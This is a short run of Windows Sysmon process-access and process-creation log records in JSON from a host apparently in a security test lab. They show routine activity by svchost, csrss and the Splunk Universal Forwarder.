{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5976,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5977,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5978,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5979,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.347\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20EF-5F25-0000-001076480900}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.347","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20EF-5F25-0000-001076480900}","TargetProcessId":"4384","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5980,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.488\r\nSourceProcessGUID: {41C8662E-20EF-5F25-0000-001076480900}\r\nSourceProcessId: 4384\r\nSourceThreadId: 3064\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.488","SourceProcessGUID":"{41C8662E-20EF-5F25-0000-001076480900}","SourceProcessId":"4384","SourceThreadId":"3064","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5981,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.020\r\nProcessGuid: {41C8662E-20F0-5F25-0000-0010304A0900}\r\nProcessId: 4800\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.020","ProcessGuid":"{41C8662E-20F0-5F25-0000-0010304A0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5982,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.019\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-001050020900}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.019","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-001050020900}","TargetProcessId":"4800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5983,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.019\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-001050020900}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.019","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-001050020900}","TargetProcessId":"4800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5984,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.019\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.019","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
